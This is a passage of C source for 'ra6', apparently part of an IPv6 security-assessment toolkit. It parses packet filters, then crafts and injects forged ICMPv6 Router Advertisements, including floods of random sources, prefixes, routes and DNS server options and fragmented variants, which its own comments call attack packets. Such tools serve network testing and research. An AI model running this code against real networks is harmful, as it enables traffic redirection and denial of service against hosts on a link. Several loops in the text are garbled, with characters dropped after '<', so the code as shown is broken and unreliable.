IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blocksrc[filters.nblocksrc]), filters.blocksrclen[filters.nblocksrc]); (filters.nblocksrc)++; break; case 'k': /* IPv6 Destination Address (block) filter */ if(filters.nblockdst >= MAX_BLOCK_DST){ puts("Too many IPv6 Destination Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blockdst[filters.nblockdst])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blockdstlen[filters.nblockdst] = 128; } else{ filters.blockdstlen[filters.nblockdst] = atoi(charptr); if(filters.blockdstlen[filters.nblockdst]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blockdst[filters.nblockdst]), filters.blockdstlen[filters.nblockdst]); (filters.nblockdst)++; break; case 'J': /* Link Source Address (block) filter */ if(filters.nblocklinksrc > MAX_BLOCK_LINK_SRC){ puts("Too many link-layer Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinksrc[filters.nblocklinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (blick) filter number %u.\n", \ filters.nblocklinksrc+1); exit(EXIT_FAILURE); } (filters.nblocklinksrc)++; break; case 'K': /* Link Destination Address (block) filter */ if(filters.nblocklinkdst > MAX_BLOCK_LINK_DST){ puts("Too many link-layer Destination Address (block) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinkdst[filters.nblocklinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (blick) filter number %u.\n", \ filters.nblocklinkdst+1); exit(EXIT_FAILURE); } filters.nblocklinkdst++; break; case 'b': /* IPv6 Source Address (accept) filter */ if(filters.nacceptsrc > MAX_ACCEPT_SRC){ puts("Too many IPv6 Source Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptsrc[filters.nacceptsrc])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptsrclen[filters.nacceptsrc] = 128; } else{ filters.acceptsrclen[filters.nacceptsrc] = atoi(charptr); if(filters.acceptsrclen[filters.nacceptsrc]>128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptsrc[filters.nacceptsrc]), filters.acceptsrclen[filters.nacceptsrc]); (filters.nacceptsrc)++; filters.acceptfilters_f=1; break; case 'g': /* IPv6 Destination Address (accept) filter */ if(filters.nacceptdst > MAX_ACCEPT_DST){ puts("Too many IPv6 Destination Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptdst[filters.nacceptdst])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptdstlen[filters.nacceptdst] = 128; } else{ filters.acceptdstlen[filters.nacceptdst] = atoi(charptr); if(filters.acceptdstlen[filters.nacceptdst] > 128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptdst[filters.nacceptdst]), filters.acceptdstlen[filters.nacceptdst]); (filters.nacceptdst)++; filters.acceptfilters_f=1; break; case 'B': /* Link-layer Source Address (accept) filter */ if(filters.nacceptlinksrc > MAX_ACCEPT_LINK_SRC){ puts("Too many link-later Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinksrc[filters.nacceptlinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (accept) filter number %u.\n", \ filters.nacceptlinksrc+1); exit(EXIT_FAILURE); } (filters.nacceptlinksrc)++; filters.acceptfilters_f=1; break; case 'G': /* Link Destination Address (accept) filter */ if(filters.nacceptlinkdst > MAX_ACCEPT_LINK_DST){ puts("Too many link-layer Destination Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinkdst[filters.nacceptlinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (accept) filter number %u.\n",\ filters.nacceptlinkdst+1); exit(EXIT_FAILURE); } (filters.nacceptlinkdst)++; filters.acceptfilters_f=1; break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'v': /* Be verbose */ idata.verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("ra6 needs root privileges to run."); exit(EXIT_FAILURE); } if(!idata.iface_f){ puts("Must specify the network interface with the -i option"); exit(EXIT_FAILURE); } if(load_dst_and_pcap(&idata, LOAD_PCAP_ONLY) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); if( pcap_datalink(idata.pfd) != DLT_EN10MB){ printf("Error: Interface %s is not an Ethernet interface", idata.iface); exit(EXIT_FAILURE); } if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6_RS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); /* If the IPv6 Source Address has not been specified, and the "-F" (flood) option has not been specified, select a random link-local unicast address. */ if(!idata.srcaddr_f && !floods_f){ /* When randomizing a link-local IPv6 address, select addresses that belong to the prefix fe80::/64 (that's what a link-local address looks-like in legitimate cases). The KAME implementation discards addresses in which the second high-order 16 bits (srcaddr.s6_addr16[1] in our case) are not zero. */ idata.srcaddr.s6_addr16[0]= htons(0xfe80); /* Link-local unicast prefix */ for(i=1;i<4;i++) idata.srcaddr.s6_addr16[i]=0x0000; for(i=4; i<8; i++) idata.srcaddr.s6_addr16[i]=random(); } /* If the flood option ("-F") has been specified, but no prefix has been specified, select the random Source Addresses from the link-local unicast prefix (fe80::/64). */ if(floods_f && !idata.srcprefix_f){ idata.srcaddr.s6_addr16[0]= htons(0xfe80); /* Link-local unicast prefix */ for(i=1;i<8;i++) idata.srcaddr.s6_addr16[i]=0x0000; idata.srcpreflen=64; } if(!idata.dstaddr_f) /* Destination Address defaults to all-nodes (ff02::1) */ if( inet_pton(AF_INET6, ALL_NODES_MULTICAST_ADDR, &(idata.dstaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } if(!idata.hsrcaddr_f) /* Source link-layer address is randomized by default */ for(i=0; i<6; i++) idata.hsrcaddr.a[i]= random(); if(!idata.hdstaddr_f) /* Destination link-layer address defaults to all-nodes */ if(ether_pton(ETHER_ALLNODES_LINK_ADDR, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("ether_pton(): Error converting all-nodes multicast address"); exit(EXIT_FAILURE); } if(sllopt_f && !sllopta_f){ /* The value of the source link-layer address option */ linkaddr[0]= idata.hsrcaddr; /* defaults to the source Ethernet address */ nlinkaddr++; } if(floodp_f){ if(nfloodp == 0){ puts("Invalid number of prefix options in option -f"); exit(EXIT_FAILURE); } if(!nprefixes){ prefixlen[0] = 64; prefixflags[0]= ND_OPT_PI_FLAG_ONLINK | ND_OPT_PI_FLAG_AUTO; prefixpref[0] = DEFAULT_PREFIX_PREFERRED; prefixvalid[0] = DEFAULT_PREFIX_VALID; } nprefixes=nfloodp; } if(floodr_f){ if(nfloodr == 0){ puts("Invalid number of route options in option -f"); exit(EXIT_FAILURE); } if(!nroutes){ routelen[0] = 64; /* By default, flood with /64s */ routepref[0]= DEFAULT_ROUTE_OPT_PREF; routelife[0] = DEFAULT_ROUTE_OPT_LIFE; } nroutes=nfloodr; } if(!floods_f) nsources=1; if(floodd_f){ if(!nrdnss) rdnsslife[0]= DEFAULT_RDNSS_LIFETIME; nrdnss=nfloodda; } if(!sleep_f) nsleep=1; if( !fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } if(fragh_f) max_packet_size = MAX_IPV6_PAYLOAD + MIN_IPV6_HLEN; else max_packet_size = ETH_DATA_LEN; if(idata.verbose_f){ print_attack_info(&idata); } /* Set initial contents of the attack packet */ init_packet_data(&idata); /* Fire an unsolicited Router Advertisement if a target IPv6 address or a target Ethernet * address were specified */ if(idata.dstaddr_f || idata.hdstaddr_f){ send_packet(&idata, NULL); if(idata.verbose_f) puts("Initial attack packet(s) sent successfully."); if(loop_f){ if(idata.verbose_f) printf("Now sending Router Advertisements every %u second%s...\n", nsleep, ((nsleep>1)?"s":"")); while(loop_f){ sleep(nsleep); send_packet(&idata, NULL); } exit(EXIT_SUCCESS); } } if(listen_f){ if(idata.verbose_f) puts("Listening to incoming ICMPv6 Router Solicitation messages..."); if( (fd= pcap_fileno(idata.pfd)) == -1){ puts("Error obtaining descriptor number for pcap_t"); exit(EXIT_FAILURE); } FD_ZERO(&sset); FD_SET(fd, &sset); while(listen_f){ rset= sset; if((sel=select(fd+1, &rset, NULL, NULL, NULL)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } /* Read a Router Solicitation message */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 0){ continue; /* Should never happen */ } pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_rs = (struct nd_router_solicit *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); accepted_f=0; if(idata.type == DLT_EN10MB && idata.flags != IFACE_LOOPBACK){ if(filters.nblocklinksrc){ if(match_ether(filters.blocklinksrc, filters.nblocklinksrc, &(pkt_ether->src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblocklinkdst){ if(match_ether(filters.blocklinkdst, filters.nblocklinkdst, &(pkt_ether->dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } } if(filters.nblocksrc){ if(match_ipv6(filters.blocksrc, filters.blocksrclen, filters.nblocksrc, &(pkt_ipv6->ip6_src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblockdst){ if(match_ipv6(filters.blockdst, filters.blockdstlen, filters.nblockdst, &(pkt_ipv6->ip6_dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(idata.type == DLT_EN10MB && idata.flags != IFACE_LOOPBACK){ if(filters.nacceptlinksrc){ if(match_ether(filters.acceptlinksrc, filters.nacceptlinksrc, &(pkt_ether->src))) accepted_f=1; } if(filters.nacceptlinkdst && !accepted_f){ if(match_ether(filters.acceptlinkdst, filters.nacceptlinkdst, &(pkt_ether->dst))) accepted_f= 1; } } if(filters.nacceptsrc && !accepted_f){ if(match_ipv6(filters.acceptsrc, filters.acceptsrclen, filters.nacceptsrc, &(pkt_ipv6->ip6_src))) accepted_f= 1; } if(filters.nacceptdst && !accepted_f){ if(match_ipv6(filters.acceptdst, filters.acceptdstlen, filters.nacceptdst, &(pkt_ipv6->ip6_dst))) accepted_f=1; } if(filters.acceptfilters_f && !accepted_f){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } if(idata.verbose_f>1) print_filter_result(&idata, pktdata, ACCEPTED); /* Send a Router Advertisement */ send_packet(&idata, pktdata); } } if(!(idata.dstaddr_f || idata.hdstaddr_f) && !listen_f){ puts("Error: Nothing to send!"); exit(EXIT_FAILURE); } exit(EXIT_SUCCESS); } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ ethernet= (struct ether_header *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->flags != IFACE_TUNNEL && idata->flags != IFACE_LOOPBACK){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; ethernet->ether_type = htons(ETHERTYPE_IPV6); } ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ ETH_DATA_LEN)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ ETH_DATA_LEN)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+ETH_DATA_LEN)){ puts("Unfragmentable part too large for current MTU (1500 bytes)"); exit(EXIT_FAILURE); } /* We prepare a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ bzero(&fraghdr, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_ICMPV6; if( (ptr+sizeof(struct nd_router_advert)) > (v6buffer+max_packet_size)){ puts("Packet too large while inserting Router Advertisement header (should be using Frag. option?)"); exit(EXIT_FAILURE); } ra= (struct nd_router_advert *) (ptr); ra->nd_ra_type = ND_ROUTER_ADVERT; ra->nd_ra_code = 0; ra->nd_ra_curhoplimit = curhop; ra->nd_ra_flags_reserved = managed_f | other_f | home_f | proxy_f | prefbits; ra->nd_ra_router_lifetime = htons(lifetime); ra->nd_ra_reachable = htonl(reachable); ra->nd_ra_retransmit = htonl(retrans); ptr += sizeof(struct nd_router_advert); /* If a single source link-layer address is specified, it is included in all packets */ if(sllopt_f && nlinkaddr==1){ if( (ptr+sizeof(struct nd_opt_slla)) <= (v6buffer+max_packet_size)){ sllaopt = (struct nd_opt_slla *) ptr; sllaopt->type= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; bcopy(linkaddr[0].a, sllaopt->address, ETH_ALEN); ptr += sizeof(struct nd_opt_slla); } else{ puts("Packet too large while processing source link-layer addresss opt. (should be using Frag. option?)"); exit(EXIT_FAILURE); } } startofprefixes = ptr; } /* * Function: send_packet() * * Initialize the remaining fields of the Router Advertisement Message, and * send the attack packet(s). */ void send_packet(struct iface_data *idata, const u_char *pktdata){ if(pktdata==NULL){ sources=0; } else{ /* Sending a response to a Router Solicitation message */ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_ipv6addr = &(pkt_ipv6->ip6_src); /* If the IPv6 Source Address of the incoming Router Solicitation is the unspecified address (::), the Router Advertisement must be directed to the IPv6 all-nodes multicast address (and the Ethernet Destination address should be 33:33:33:00:00:01). Otherwise, the Router Advertisement is directed to the IPv6 Source Address (and Ethernet Source Address) of the incoming Router Solicitation message */ if(IN6_IS_ADDR_UNSPECIFIED(pkt_ipv6addr)){ if ( inet_pton(AF_INET6, ALL_NODES_MULTICAST_ADDR, &(ipv6->ip6_dst)) <= 0){ perror("inet_pton():"); exit(EXIT_FAILURE); } if(ether_pton(ETHER_ALLNODES_LINK_ADDR, &(ethernet->dst), ETHER_ADDR_LEN) == 0){ puts("ether_pton(): Error converting all-nodes link-local address"); exit(EXIT_FAILURE); } } else{ ipv6->ip6_dst = pkt_ipv6->ip6_src; ethernet->dst = pkt_ether->src; } pkt_ipv6addr = &(pkt_ipv6->ip6_dst); /* If the Router Solicitation message was directed to a unicast address (unlikely), the IPv6 Source Address and the Ethernet Source Address of the Router Advertisement are set to the IPv6 Destination Address and the Ethernet Destination Address of the incoming Router Solicitation, respectively. Otherwise, the IPv6 Source Address and the Ethernet Source Address are set as specified by the command-line (or randomized). */ if(IN6_IS_ADDR_MULTICAST(pkt_ipv6addr)){ ipv6->ip6_src = idata->srcaddr; ethernet->src = idata->hsrcaddr; sources=0; multicastdst_f=1; } else{ ipv6->ip6_src = pkt_ipv6->ip6_dst; ethernet->src = pkt_ether->dst; sources=nsources; multicastdst_f=0; } } do{ if(floods_f && (pktdata==NULL || (pktdata != NULL && multicastdst_f))){ /* Randomize the IPv6 Source address based on the specified prefix and prefix length (defaults to fe80::/64). */ startrand= idata->srcpreflen/16; for(i=0; iip6_src.s6_addr16[i]= 0; for(i=startrand; i<8; i++) ipv6->ip6_src.s6_addr16[i]=random(); if(idata->srcpreflen%16){ mask=0xffff; for(i=0; i<(idata->srcpreflen%16); i++) mask= mask>>1; ipv6->ip6_src.s6_addr16[startrand]= ipv6->ip6_src.s6_addr16[startrand] & htons(mask); } for(i=0; i<=(idata->srcpreflen/16); i++) ipv6->ip6_src.s6_addr16[i]= ipv6->ip6_src.s6_addr16[i] | idata->srcaddr.s6_addr16[i]; if(!idata->hsrcaddr_f){ for(i=0; i<6; i++) ethernet->src.a[i]= random(); /* If the source-link layer address must be included, but no value was specified we set it to the randomized Ethernet Source Address */ if(sllopt_f && !sllopta_f){ bcopy(ethernet->src.a, sllaopt->address, ETH_ALEN); } } } prefixes= 0; routes= 0; dnsopts= 0; mtus=0; if(nlinkaddr==1) linkaddrs=1; else linkaddrs=0; do{ /* newdata_f handles the case where it is impossible for the packet to incorporate options, and hence this would result in and endless loop */ newdata_f=0; ptr = startofprefixes; while(linkaddrstype= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; bcopy(linkaddr[linkaddrs].a, sllaopt->address, ETH_ALEN); ptr += sizeof(struct nd_opt_slla); linkaddrs++; newdata_f=1; } while(mtusnd_opt_mtu_type = ND_OPT_MTU; mtuopt->nd_opt_mtu_len = MTU_OPT_LEN; mtuopt->nd_opt_mtu_reserved = 0; mtuopt->nd_opt_mtu_mtu = htonl(mtu[mtus]); ptr += sizeof(struct nd_opt_mtu); mtus++; newdata_f=1; } while(prefixesnd_opt_pi_type= ND_OPT_PREFIX_INFORMATION; prefixopt->nd_opt_pi_len= PREFIX_OPT_LEN; if(!floodp_f){ prefixopt->nd_opt_pi_flags_reserved= prefixflags[prefixes]; prefixopt->nd_opt_pi_prefix_len= prefixlen[prefixes]; prefixopt->nd_opt_pi_valid_time = htonl(prefixvalid[prefixes]); prefixopt->nd_opt_pi_preferred_time = htonl(prefixpref[prefixes]); prefixopt->nd_opt_pi_reserved2 = 0; prefixopt->nd_opt_pi_prefix = prefix[prefixes]; } else{ prefixopt->nd_opt_pi_flags_reserved= prefixflags[0]; prefixopt->nd_opt_pi_prefix_len= prefixlen[0]; prefixopt->nd_opt_pi_valid_time = htonl(prefixvalid[0]); prefixopt->nd_opt_pi_preferred_time = htonl(prefixpref[0]); prefixopt->nd_opt_pi_reserved2 = 0; endrand= (prefixlen[0]+15)/16; for(i=0; ind_opt_pi_prefix.s6_addr16[i]=random(); if(prefixlen[0]%16){ mask=0; for(i=0; i<(prefixlen[0]%16); i++) mask= (mask>>1) | 0x8000; prefixopt->nd_opt_pi_prefix.s6_addr16[endrand-1]= \ prefixopt->nd_opt_pi_prefix.s6_addr16[endrand-1] & htons(mask); } for(i=endrand;i<8;i++) prefixopt->nd_opt_pi_prefix.s6_addr16[i]=0; } ptr += sizeof(struct nd_opt_prefix_info); prefixes++; newdata_f=1; } while(routes < nroutes && (((ptr+ sizeof(struct nd_opt_route_info_l)) - v6buffer) \ <= max_packet_size)){ routeopt = (struct nd_opt_route_info_l *) ptr; routeopt->nd_opt_ri_type=ND_OPT_ROUTE_INFORMATION; routeopt->nd_opt_ri_len= MAX_ROUTE_OPT_LEN; if(!floodr_f){ routeopt->nd_opt_ri_rsvd_pref_rsvd= routepref[routes]; routeopt->nd_opt_ri_prefix = route[routes]; routeopt->nd_opt_ri_prefix_len= routelen[routes]; routeopt->nd_opt_ri_lifetime = htonl(routelife[routes]); } else{ routeopt->nd_opt_ri_rsvd_pref_rsvd= routepref[0]; routeopt->nd_opt_ri_prefix_len= routelen[0]; routeopt->nd_opt_ri_lifetime = htonl(routelife[0]); endrand= (routelen[0]+15)/16; for(i=0; ind_opt_ri_prefix.s6_addr16[i]=random(); if(routelen[0]%16){ mask=0; for(i=0; i<(routelen[0]%16); i++) mask= (mask>>1) | 0x8000; routeopt->nd_opt_ri_prefix.s6_addr16[endrand-1]= \ routeopt->nd_opt_ri_prefix.s6_addr16[endrand-1] & htons(mask); } for(i=endrand;i<8;i++) routeopt->nd_opt_ri_prefix.s6_addr16[i]=0; } ptr += sizeof(struct nd_opt_route_info_l); routes++; newdata_f=1; } if(!floodd_f){ while(dnsopts < nrdnss && (((ptr+ sizeof(struct nd_opt_rdnss_l)\ + nrdnssopt[dnsopts] * sizeof(struct in6_addr) ) - v6buffer) <= max_packet_size)){ dnsopt = (struct nd_opt_rdnss_l *) ptr; dnsopt->nd_opt_rdnss_type= ND_OPT_RDNSS; dnsopt->nd_opt_rdnss_len= (sizeof(struct nd_opt_rdnss_l) + nrdnssopt[dnsopts] \ * sizeof(struct in6_addr))/8; dnsopt->nd_opt_rdnss_lifetime= htonl(rdnsslife[dnsopts]); for(i=0; i< nrdnssopt[dnsopts]; i++) dnsopt->nd_opt_rdnss_addr[i] = rdnss[dnsopts][i]; ptr+= sizeof(struct nd_opt_rdnss_l) + sizeof(struct in6_addr) * nrdnssopt[dnsopts]; dnsopts++; newdata_f=1; } } else{ while(dnsopts < nrdnss){ smaxaddrs = (max_packet_size - (ptr-v6buffer) - sizeof(struct nd_opt_rdnss_l))\ / sizeof(struct in6_addr); if(smaxaddrs>0){ dnsopt = (struct nd_opt_rdnss_l *) ptr; dnsopt->nd_opt_rdnss_type= ND_OPT_RDNSS; dnsopt->nd_opt_rdnss_lifetime= htonl(rdnsslife[0]); for(i=0; ind_opt_rdnss_addr[i].s6_addr16[j]=random(); dnsopt->nd_opt_rdnss_len= (sizeof(struct nd_opt_rdnss_l) + \ i * sizeof(struct in6_addr))/8; ptr+= sizeof(struct nd_opt_rdnss_l) + sizeof(struct in6_addr) * i; newdata_f=1; } } } ra->nd_ra_cksum = 0; ra->nd_ra_cksum = in_chksum(v6buffer, ra, ptr-((unsigned char *)ra), IPPROTO_ICMPV6); if(!fragh_f){ ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + ETHER_HDR_LEN); fptrend = fptr + ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); exit(EXIT_FAILURE); } memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest fragment size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - ETHER_HDR_LEN); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } } }while( (linkaddrs>nlinkaddr || mtus\n" "Please send any bug reports to " ); } /* * Function: print_attack_info() * * Print attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ if(!floods_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, ((!idata->hsrcaddr_f)?" (randomized)":"")); } else{ if(idata->hsrcaddr_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s\n", plinkaddr); } else puts("Ethernet Source Address: randomized for each packet"); } /* Ethernet Destination Address only used if a target IPv6 address or a target Ethernet * address were specified */ if(idata->dstaddr_f || idata->hdstaddr_f){ if(ether_ntop(&(idata->hdstaddr), phdstaddr, sizeof(phdstaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", phdstaddr, \ ((!idata->hdstaddr_f)?" (all-nodes multicast)":"")); } if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(!floods_f){ printf("IPv6 Source Address: %s%s\n", psrcaddr, ((!idata->srcaddr_f)?" (randomized)":"")); } else{ printf("IPv6 Source Address: randomized, from the %s/%u prefix%s\n", psrcaddr, idata->srcpreflen, \ (!idata->srcprefix_f)?" (default)":""); } /* IPv6 Destination Address is only used if a target IPv6 address or a target Ethernet * address were specified */ if(idata->dstaddr_f || idata->hdstaddr_f){ if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ perror("inet_ntop()"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s%s\n", pdstaddr, \ ((!idata->dstaddr_f)?" (all-nodes link-local multicast)":"")); } printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (default)"); for(i=0; i Address: %s\n", \ ((floods_f && !sllopta_f)?"(randomized for each packet)":plinkaddr)); } for(i=0;i MTU: %u\n", mtu[i]); if(!floodp_f){ for(i=0; i"); if(inet_ntop(AF_INET6, &prefix[i], pprefix, sizeof(pprefix)) == NULL){ perror("inet_ntop()"); exit(EXIT_FAILURE); } printf("Prefix: %s/%u\tFlags: %s%s%s%s ", pprefix, prefixlen[i], \ ((prefixflags[i] & 